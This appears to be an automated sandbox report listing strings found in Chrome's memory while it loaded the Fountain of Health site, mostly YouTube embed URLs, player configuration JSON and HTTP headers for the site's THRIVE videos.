Source: chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: 3+https://www.youtube.com/generate_204?oFXXFw( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2500594658.000028EC06708000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: 5https://www.youtube.com/^0https://fountainofhealth.ca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: 7https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2343716935.000028EC04BCE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323304427.000028EC06AA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/FURi5aHg1g? equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX# equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2342010290.000028EC04DF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2499056442.000028EC0621C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/gobWGqPjSQ? equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2502877436.000028EC06F59000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/h15NcT6UXh0?siYrX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491838575.000028EC04094000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/h15NcT6Uh0? equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=json( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=jsonscriptSource equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
NTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24
Source: chrome.exe, 00000000.00000002.2508320989.000028EC07F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CO
NTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24
Source: chrome.exe, 00000000.00000002.2487618019.000028EC03BAC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: DM?www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2321018206.000028EC04C90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Data_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2370451846.000028EC04B44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370551942.000028EC038DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341031480.000028EC06930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025E7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2471255420.000028EC02708000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377894851.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2371291317.000028EC08030000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2320456301.000028EC04810000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352226880.000028EC041A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: E_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352259272.000028EC04CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323201812.000028EC04CAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2369861259.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTP/1.1 200access-control-allow-origin:https://www.youtube.comcross-origin-resource-policy:cross-originaccess-control-allow-credentials:trueaccess-control-allow-headers:X-Playlog-Webcontent-type:text/plain; charset=UTF-8content-encoding:gzipdate:Thu, 22 May 2025 15:06:35 GMTserver:Playlogcontent-length:131x-xss-protection:0x-frame-options:SAMEORIGINalt-svc:h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC0458C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: HTTP/1.1 200access-control-allow-origin:https://www.youtube.comcross-origin-resource-policy:cross-originaccess-control-allow-credentials:trueaccess-control-allow-headers:X-Playlog-Webp3p:CP="This is not a P3P policy! See g.co/p3phelp for more info."content-type:text/plain; charset=UTF-8content-encoding:gzipdate:Thu, 22 May 2025 15:06:33 GMTserver:Playlogcontent-length:131x-xss-protection:0x-frame-options:SAMEORIGINalt-svc:h3=":443"; ma=2592000,h3-29=":443"; ma=2592000expires:Thu, 22 May 2025 15:06:33 GMTcache-control:private equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2360620898.000028EC06804000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ","url":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","taburl":"https://fountainofhealth.ca/en","IsInline":false,"Dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2302249757.000028EC04D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ","url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","taburl":"https://fountainofhealth.ca/en","IsInline":false,"Dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: I_keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2332503048.000028EC04B10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Jhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.jsaDb equals www.youtube.com (Youtube)
",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24499532,24566687,
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},vm:function(){e=tb()},ie:function(){d()}}};var cc=wa(["data-gtm-yt-inspected-"]),GI=["www.youtube.com","www.youtube-nocookie.com"],HI,II=!1; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: Mhttps://www.youtube.com/^0https://fountainofhealth.ca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: Mhttps://www.youtube.com/^0https://fountainofhealth.ca/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501943849.000028EC06D2C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: Oript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2505015083.000028EC07974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: QIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352502411.000028EC04CA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: RIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: RIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}AYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: RJhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330677012.000028EC001CA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: SKhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Science of THRIVE Approach3+https://www.youtube.com/watch?v=gobWGqPjLSQ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Times New RomanE=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Times New RomanE=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2340748270.000028EC06CF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Watch on YouTubenfhttps://www.youtube.com/watch?v=gobWGqPjLSQ&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Watch on YouTubenfhttps://www.youtube.com/watch?v=h15NcT6UXh0&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Welcome to Thrive Learning3+https://www.youtube.com/watch?v=h15NcT6UXh0 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323428029.000028EC04BDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323165506.000028EC04C3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/form/contact-us","https://twitter.com/FoHTHRIVE","https://www.facebook.com/FOHThrive","https://fountainofhealth.ca/en/home","https://www.youtube.com/@fountainofhealth2679","https://fountainofhealth.ca/fr/node/113","https://fountainofhealth.ca/en#main-content","https://fountainofhealth.ca/organizations","https://fountainofhealth.ca/individuals","https://fountainofhealth.ca/clinicians","https://fountainofhealth.ca/our-people-partners#world","https://fountainofhealth.ca/our-people-partners#teams",null,"https://fountainofhealth.ca/thrive/thoughts","https://fountainofhealth.ca/thrive/health-habits","https://fountainofhealth.ca/thrive/relationship","https://fountainofhealth.ca/thrive/interests","https://fountainofhealth.ca/thrive/valued-goals","https:/
Source: chrome.exe, 00000000.00000003.2344000946.000028EC04BB2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343716935.000028EC04BCE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
